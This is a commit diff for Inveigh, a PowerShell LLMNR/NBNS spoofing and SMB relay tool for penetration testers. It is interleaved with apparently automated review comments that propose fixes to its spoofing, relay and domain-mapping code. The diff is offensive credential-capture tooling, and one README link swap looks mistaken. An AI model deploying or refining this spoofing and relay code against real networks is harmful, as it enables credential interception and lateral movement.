author | Kevin Robertson <Kevin-Robertson@users.noreply.github.com> | 2019-01-30 23:05:50 -0500 |
---|---|---|
committer | Kevin Robertson <Kevin-Robertson@users.noreply.github.com> | 2019-01-30 23:05:50 -0500 |
commit | 2bcdf493e87cd44cf5ad7bf30f45d97b3ac5a638 (patch) | |
tree | 88232e93dcd4670eaaf41a3dfc8c17e0c84747b6 | |
parent | dfd419e7669693f9d8a47b00172e84e558feee35 (diff) | |
Kerberos detection and bug fixes
Added indicator for when SMB auth negotiates to Kerberos. Bug fixes.
-rw-r--r-- | Inveigh-Relay.ps1 | 62 | ||||
-rw-r--r-- | Inveigh.ps1 | 33 | ||||
-rw-r--r-- | README.md | 6 |
3 files changed, 74 insertions, 27 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1 index 88dbc26..d4ca2cd 100644 --- a/Inveigh-Relay.ps1 +++ b/Inveigh-Relay.ps1 @@ -36,6 +36,10 @@ displaying full capture lists when running through a shell that does not have ac Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. +.PARAMETER DomainMapping +Array to map one netBIOS domain to one DNS domain. Needed when attacking a domain from a non-domain +attached system with data imported from BloodHound. + .PARAMETER Enumerate Default = All: (All/Group/NetSession/Share/User) The action that will be used for the 'Enumerate' attack. @@ -214,6 +218,7 @@ param [parameter(Mandatory=$false)][ValidateSet("All","NetSession","Share","User","Group")][String]$Enumerate = "All", [parameter(Mandatory=$false)][ValidateSet("Random","Strict")][String]$TargetMode = "Random", [parameter(Mandatory=$false)][String]$EnumerateGroup = "Administrators", + [parameter(Mandatory=$false)][Array]$DomainMapping = "", [parameter(Mandatory=$false)][Array]$Target = "", [parameter(Mandatory=$false)][Array]$TargetExclude = "", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", @@ -279,7 +284,7 @@ if($inveigh.relay_running) throw } -$inveigh_version = "1.4" +$inveigh_version = "1.4.1" if(!$target -and !$inveigh.enumerate) { @@ -304,10 +309,21 @@ if($ProxyIP -eq '0.0.0.0') if($Attack -contains 'Execute' -and !$Command) { - Write-Output "[-] -Command requiried with -Attack Execute" + Write-Output "[-] -Command required with -Attack Execute" throw } +if($DomainMapping) +{ + + if($DomainMapping.Count -ne 2 -or $DomainMapping[0] -like "*.*" -or $DomainMapping[1] -notlike "*.*") + { + Write-Output "[-] -DomainMapping format is incorrect" + throw + } + +} + if(!$FileOutputDirectory) { $output_directory = $PWD.Path 
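Review bot: The new `-DomainMapping` validation in the `if($DomainMapping)` block accepts an empty netBIOS element, e.g. `-DomainMapping "","corp.local"`, because `"" -like "*.*"` is false and nothing else rejects it; that empty string is later copied into `$inveigh.netBIOS_domain`, which evaluates as false, so the mapping would presumably be bypassed by the `if(!$inveigh.netBIOS_domain)` initialization guard and the environment values used instead without any error. Suggest tightening the check to `if($DomainMapping.Count -ne 2 -or !$DomainMapping[0] -or $DomainMapping[0] -like "*.*" -or $DomainMapping[1] -notlike "*.*")`. The error text could also say what shape is expected, e.g. `Write-Output "[-] -DomainMapping format is incorrect, expected NETBIOSNAME,dns.domain"`, since the operator otherwise has to read the source to find out.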
@@ -641,6 +657,13 @@ if($Proxy -eq 'Y') } +if($DomainMapping) +{ + $inveigh.output_queue.Add("[+] Domain Mapping = " + ($DomainMapping -join ",")) > $null + $inveigh.netBIOS_domain = $DomainMapping[0] + $inveigh.DNS_domain = $DomainMapping[1] +} + $inveigh.output_queue.Add("[+] Relay Attack = " + ($Attack -join ",")) > $null # math taken from https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b @@ -1028,14 +1051,32 @@ while($inveigh.output_queue.Count -gt 0) } -$inveigh.status_output = $false -$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value -$inveigh.computer_name = (Get-ChildItem -path env:computername).Value +if(!$inveigh.netBIOS_domain) +{ + $inveigh.status_output = $false + $inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value + $inveigh.computer_name = (Get-ChildItem -path env:computername).Value -try + try + { + $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain -ErrorAction 'SilentlyContinue').Value).ToLower() + $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower() + + if(!$inveigh.domain_mapping_table.ContainsKey($inveigh.netBIOS_domain)) + { + $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain) + } + + } + catch + { + $inveigh.DNS_domain = $inveigh.netBIOS_domain + $inveigh.DNS_computer_name = $inveigh.computer_name + } + +} +else { - $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain -ErrorAction 'SilentlyContinue').Value).ToLower() - $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower() if(!$inveigh.domain_mapping_table.ContainsKey($inveigh.netBIOS_domain)) { @@ -1043,11 +1084,6 @@ try } } -catch -{ - $inveigh.DNS_domain = $inveigh.netBIOS_domain - $inveigh.DNS_computer_name = $inveigh.computer_name -} if($inveigh.enumerate) { diff --git a/Inveigh.ps1 b/Inveigh.ps1 index cbeaf43..0deb8a7 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 
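Review bot: `$inveigh.DNS_domain = $DomainMapping[1]` stores the operator-supplied DNS domain verbatim, whereas the environment path later in this file lowercases `env:userdnsdomain` before storing it, so the two sources can disagree in case; if `DNS_domain` is concatenated into hostnames or compared with case-sensitive operators elsewhere, a mapping typed as `CORP.LOCAL` would behave differently from the env-derived `corp.local`. Suggest normalizing at the assignment, `$inveigh.DNS_domain = $DomainMapping[1].ToLower()`, so both sources produce the same value. I cannot see the downstream comparisons from this hunk, so confirm nothing depends on the original case before changing it.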
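Review bot: Gating the environment lookup on `if(!$inveigh.netBIOS_domain)` makes initialization depend on whatever is already in the `$inveigh` hashtable rather than on the parameters of this run; the `if($inveigh.relay_running)` check near the top of the script indicates that hashtable outlives a run, so a second invocation in the same session without `-DomainMapping` would inherit the previous run's mapping instead of re-reading `env:userdomain`. The new `else` branch also never assigns `$inveigh.computer_name`, `$inveigh.DNS_computer_name` or `$inveigh.status_output`, so a fresh session started with `-DomainMapping` leaves those unset unless something outside this hunk fills them. Suggest keying the branch on the parameter, `if(!$DomainMapping)`, and assigning the host values in both branches, e.g. `$inveigh.computer_name = (Get-ChildItem -path env:computername).Value` followed by `$inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower()` inside the `else`. The `else` block closes in the following hunk.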
@@ -448,7 +448,7 @@ if($invalid_parameter) throw } -$inveigh_version = "1.4" +$inveigh_version = "1.4.1" if(!$IP) { @@ -655,6 +655,7 @@ if($StartupChecks -eq 'Y') if($LLMNR -eq 'Y' -and !$elevated_privilege) { $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 " + $LLMNR_port_check = $false } if($mDNS -eq 'Y' -and !$elevated_privilege) @@ -802,11 +803,6 @@ catch $inveigh.DNS_computer_name = $inveigh.computer_name } -if($inveigh.relay_running) -{ - # $inveigh.output_pause = $true -} - #endregion #region begin startup messages $inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null @@ -2543,6 +2539,13 @@ $SMB_NTLM_functions_scriptblock = $inveigh.SMB_session_table.Add($Session,"") } + $SMB_index = $payload_converted.IndexOf("2A864886F712010202") + + if($SMB_index -gt 0 -and $SourceIP -ne $IP) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) authentication method is Kerberos for $Session") > $null + } + } function Get-SMBNTLMChallenge @@ -3445,6 +3448,7 @@ $sniffer_scriptblock = $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 $binary_reader.ReadBytes(7) > $null $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) + switch ($destination_port) { @@ -3683,6 +3687,7 @@ $sniffer_scriptblock = $NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point) > $null $NBNS_send_socket.Close() $NBNS_response_message = "[response sent]" + $connection_check_IP = $source_IP } else { @@ -3765,6 +3770,7 @@ $sniffer_scriptblock = $send_socket.SendTo($mDNS_response_packet,$destination_point) > $null $send_socket.Close() $mDNS_response_message = "[response sent]" + $connection_check_IP = $source_IP } else { 
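Review bot: The added `$LLMNR_port_check = $false` unconditionally overwrites the `netstat -anp UDP | findstr /C:"0.0.0.0:5355 "` result on the line above it, so the LLMNR port-in-use check can no longer report anything, and the netstat/findstr pipeline is now dead work that still spawns two external processes at startup. If the intent is to disable the check because the unprivileged LLMNR spoofer binds 5355 itself (the `New-Object System.Net.Sockets.UdpClient 5355` path elsewhere in this diff), remove the netstat line as well and say so, e.g. `# LLMNR port check disabled: the unprivileged spoofer binds 5355 itself`; if not, drop the override so an existing listener is still surfaced before the bind is attempted. The enclosing `if($StartupChecks -eq 'Y')` block starts and ends outside the hunk.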
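Review bot: `$payload_converted.IndexOf("2A864886F712010202")` matches the Kerberos V5 mechanism OID anywhere in the SMB payload, and SPNEGO tokens list that OID in mechTypes whenever a client merely advertises Kerberos support, so the "authentication method is Kerberos" indicator can fire on sessions that actually negotiate NTLM and can repeat for every packet carrying a token; note also that `IndexOf` returns -1 when absent, so `-ge 0` is the exact test, though `-gt 0` only misses an OID at offset 0. Consider requiring that the same payload does not also carry an NTLMSSP signature, `$payload_converted.IndexOf("4E544C4D53535000") -lt 0`, and recording the indicator once per session by consulting the `$inveigh.SMB_session_table` entry added just above rather than on every packet. The enclosing function begins before the hunk, so where `$payload_converted`, `$Session` and `$IP` come from is not visible here.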
@@ -3932,6 +3938,7 @@ $sniffer_scriptblock = $LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point) > $null $LLMNR_send_socket.Close() $LLMNR_response_message = "[response sent]" + $connection_check_IP = $source_IP } else { @@ -3998,10 +4005,10 @@ $sniffer_scriptblock = # Unprivileged LLMNR Spoofer ScriptBlock $LLMNR_spoofer_scriptblock = { - param ($Inspect,$LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) + param ($Inspect,$LLMNR_response_message,$LLMNRTTL,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferNonprintable) $LLMNR_running = $true - $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355) + $LLMNR_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Any,5355) try { @@ -4029,7 +4036,7 @@ $LLMNR_spoofer_scriptblock = catch { $LLMNR_UDP_client.Close() - $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 $LLMNR_multicast_group = [IPAddress]"224.0.0.252" $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 @@ -4069,7 +4076,7 @@ $LLMNR_spoofer_scriptblock = $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint) $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) $LLMNR_UDP_client.Close() - $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 $LLMNR_multicast_group = [IPAddress]"224.0.0.252" $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 
@@ -4816,9 +4823,9 @@ function LLMNRSpoofer $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument( - $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument( - $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( - $SpooferNonprintable).AddArgument($LLMNRTTL) > $null + $LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($SpooferIP).AddArgument( + $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferIPsIgnore).AddArgument($SpooferNonprintable) > $null $LLMNR_spoofer_powershell.BeginInvoke() > $null } @@ -2,8 +2,11 @@ Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. +## 1.4 Release Blog +* https://blog.netspi.com/inveigh-whats-new-in-version-1-4/ + ## Wiki -* https://github.com/Kevin-Robertson/Inveigh/wiki +* https://github.com/SecureAuthCorp/impacket ## Included In * PowerShell Empire - https://github.com/PowerShellEmpire/Empire @@ -12,6 +15,7 @@ Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle too * PowerUpSQL - https://github.com/NetSPI/PowerUpSQL * PoshC2 - https://github.com/nettitude/PoshC2 * pupy - https://github.com/n1nj4sec/pupy +* Merlin - https://github.com/Ne0nd0g/merlin ## Special Thanks * Anyone that posted .NET packet sniffing examples |
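Review bot: The reordered `AddArgument` chain in `LLMNRSpoofer` fixes the positional mismatch with the scriptblock's `param(...)` (previously `$SpooferNonprintable` landed in `$LLMNRTTL`), but the call still binds nine values by position against a `param` list several thousand lines away, which is exactly how the mismatch arose. Binding by name with `AddParameter` makes the order irrelevant and prevents the same silent misbinding from reappearing the next time a parameter is added. `LLMNRSpoofer` begins before the hunk.
```powershell
$LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddParameter("Inspect",$Inspect).AddParameter(
    "LLMNR_response_message",$LLMNR_response_message).AddParameter("LLMNRTTL",$LLMNRTTL).AddParameter(
    "SpooferIP",$SpooferIP).AddParameter("SpooferHostsReply",$SpooferHostsReply).AddParameter(
    "SpooferHostsIgnore",$SpooferHostsIgnore).AddParameter("SpooferIPsReply",$SpooferIPsReply).AddParameter(
    "SpooferIPsIgnore",$SpooferIPsIgnore).AddParameter("SpooferNonprintable",$SpooferNonprintable) > $null
# … unchanged: BeginInvoke …
```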